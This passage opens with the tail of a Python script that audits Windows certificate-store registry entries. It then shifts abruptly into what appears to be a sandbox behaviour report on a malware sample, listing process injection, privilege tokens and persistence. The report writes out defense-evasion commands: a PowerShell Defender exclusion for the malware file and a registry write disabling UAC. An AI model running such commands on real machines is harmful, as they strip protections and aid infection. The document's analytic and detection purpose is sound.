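    "9bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3"
    "672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2"
)

def parse_blob(blob: bytes) -> dict:
    """Blob = run of {u32 prop_id, u32 flags (always 1), u32 length, data}, little-endian, no header."""
    props, off = {}, 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated property header at offset {off}")
        prop_id, flags, length = struct.unpack_from("<III", blob, off)
        off += 12
        if flags != 1 or off + length > len(blob):
            raise ValueError(f"property {prop_id}: bad flags {flags:#x} or length {length}")
        props[prop_id] = blob[off:off + length]
        off += length
    return props

def common_names(der: bytes) -> list:
    """Minimal DER scan: each CN attribute is the CN OID followed by a PrintableString (0x13)
    or UTF8String (0x0c) with a one-byte length. Returns issuer CN, then subject CN."""
    names, pos = [], der.find(OID_COMMON_NAME)
    while pos != -1 and pos + 7 <= len(der):
        tag, length = der[pos + 5], der[pos + 6]
        if tag in (0x13, 0x0c) and length < 0x80:
            names.append(der[pos + 7:pos + 7 + length].decode("ascii", "replace"))
        pos = der.find(OID_COMMON_NAME, pos + 1)
    return names

def check_store_entry(key_name: str, blob_hex: str) -> dict:
    """Recompute the embedded certificate's hashes and compare them with the key name and stored hash properties."""
    props = parse_blob(bytes.fromhex(blob_hex))
    der = props[32]                                      # CERT_CERT_PROP_ID
    sha1 = hashlib.sha1(der).hexdigest().upper()
    sha256 = hashlib.sha256(der).hexdigest().upper()
    cns = common_names(der)
    return {
        "property_ids": sorted(props),
        "cert_len": len(der),
        "sha1": sha1,
        "sha256": sha256,
        "key_matches_sha1": sha1 == key_name.upper(),     # registry key name is the SHA-1 thumbprint
        "sha1_prop_matches": props.get(3) == bytes.fromhex(sha1),      # CERT_SHA1_HASH_PROP_ID
        "sha256_prop_matches": props.get(98) == bytes.fromhex(sha256),  # CERT_AUTH_ROOT_SHA256_HASH_PROP_ID
        "friendly_name": props.get(11, b"").decode("utf-16-le").rstrip("\x00"),  # CERT_FRIENDLY_NAME_PROP_ID
        "common_names": cns,
        "self_issued": len(cns) == 2 and cns[0] == cns[1],
    }

if __name__ == "__main__":
    for k, v in check_store_entry(AUTHROOT_KEY, BLOB_HEX).items():
        print(f"{k:20} {v}")
```

Run directly, it prints the property inventory, both thumbprints, the match verdicts and the CNs. The value format is identical for Root, AuthRoot, CA and Disallowed and for the per-user hives, so the same function audits a live host once the Blob values are read out with reg.exe or Get-ItemProperty; a mismatch between key name and recomputed SHA-1 means the entry was not written by CryptoAPI's normal store code.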

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe N/A
N/A N/A C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 228 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 228 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 932 wrote to memory of 1268 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe
PID 932 wrote to memory of 1268 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe
PID 932 wrote to memory of 1268 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe
PID 932 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe
PID 932 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe
PID 932 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe
PID 932 wrote to memory of 3080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe
PID 932 wrote to memory of 3080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe
PID 932 wrote to memory of 3080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe
PID 932 wrote to memory of 4896 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe
PID 932 wrote to memory of 4896 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe
PID 932 wrote to memory of 4896 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe
PID 932 wrote to memory of 428 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe
PID 932 wrote to memory of 428 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe
PID 932 wrote to memory of 428 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe
PID 932 wrote to memory of 5100 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe
PID 932 wrote to memory of 5100 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe
PID 932 wrote to memory of 5100 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe
PID 1268 wrote to memory of 4736 N/A C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1268 wrote to memory of 4736 N/A C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1268 wrote to memory of 4736 N/A C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 932 wrote to memory of 4200 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe
PID 932 wrote to memory of 4200 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe
PID 932 wrote to memory of 4628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe
PID 932 wrote to memory of 4628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe
PID 932 wrote to memory of 4628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe
PID 4896 wrote to memory of 4940 N/A C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp
PID 4896 wrote to memory of 4940 N/A C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp
PID 4896 wrote to memory of 4940 N/A C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp
PID 3080 wrote to memory of 3828 N/A C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp
PID 3080 wrote to memory of 3828 N/A C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp
PID 3080 wrote to memory of 3828 N/A C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp
PID 932 wrote to memory of 812 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe
PID 932 wrote to memory of 812 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe
PID 932 wrote to memory of 812 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe
PID 932 wrote to memory of 2248 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 932 wrote to memory of 2248 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 932 wrote to memory of 2248 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 932 wrote to memory of 4104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\bu5UWBMNJxJyXBl36BFg9XOI.exe
PID 932 wrote to memory of 4104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\bu5UWBMNJxJyXBl36BFg9XOI.exe
PID 2248 wrote to memory of 2472 N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 2248 wrote to memory of 2472 N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 2248 wrote to memory of 2472 N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 4736 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 4736 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 4736 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 4736 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 4736 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 4736 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 3828 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp C:\Users\Admin\AppData\Local\Temp\is-UJ6HF.tmp\_isetup\_setup64.tmp
PID 3828 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp C:\Users\Admin\AppData\Local\Temp\is-UJ6HF.tmp\_isetup\_setup64.tmp
PID 2248 wrote to memory of 1200 N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 2248 wrote to memory of 1200 N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 2248 wrote to memory of 1200 N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe

"C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe

"C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

"C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe" --silent --allusers=0

C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe

"C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe"

C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp

